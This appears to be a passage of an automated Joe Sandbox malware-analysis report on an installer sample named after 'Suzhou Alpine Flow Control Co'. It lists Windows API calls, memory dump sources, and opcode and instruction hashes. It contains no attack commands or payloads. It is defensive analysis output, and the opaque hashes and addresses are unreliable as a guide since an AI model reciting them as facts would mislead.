                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointerwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 327478801-0
                                                                                                    • Opcode ID: 8a12d942855201ad551ff6b8522964b2a85f1590b66411236d4fcde10ada766a
                                                                                                    • Instruction ID: c1a7dfb6bf4929fe1d7a037cd3c1fce150a4b9cbb888a554fff21e85dc6fb100
                                                                                                    • Opcode Fuzzy Hash: 8a12d942855201ad551ff6b8522964b2a85f1590b66411236d4fcde10ada766a
                                                                                                    • Instruction Fuzzy Hash: 4DE01AB1B10114ABDB01ABE59D49CFFB66CEB40318F20083BF101B00D1C27949019A7E
                                                                                                    APIs
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 390214022-0
                                                                                                    • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                    • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                    • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                    • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000305,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                                                                    • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                                                                    • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                                                                    • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                    • Instruction ID: 39c184252658266456f323190e8639734e0c032000ef403b7d50d3af51f805c1
                                                                                                    • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                    • Instruction Fuzzy Hash: 68E08632108659ABEF105E508C00AEB3B5CEB04754F004832F911E3140D234E8118BA4
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                    • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                    • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1096422788-0
                                                                                                    • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                    • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                    • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                    • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                                                                    • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                                                                    • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                                                                    • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                    • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                                                                    • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                    • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                    • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                    • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                    • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                                    • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                                                    • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                                    • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                                    • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                                                    • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                                    • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                                                                    • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                                                                    • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                                                                    • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocGlobal
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761449716-0
                                                                                                    • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                    • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                    • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                    • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C1D
                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                                                                    • SetWindowLongW.USER32(?,000000FC,004051A8), ref: 00404C49
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C5D
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404CA3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404DE1
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DEF
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F77
                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F9B
                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 00405131
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405191
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
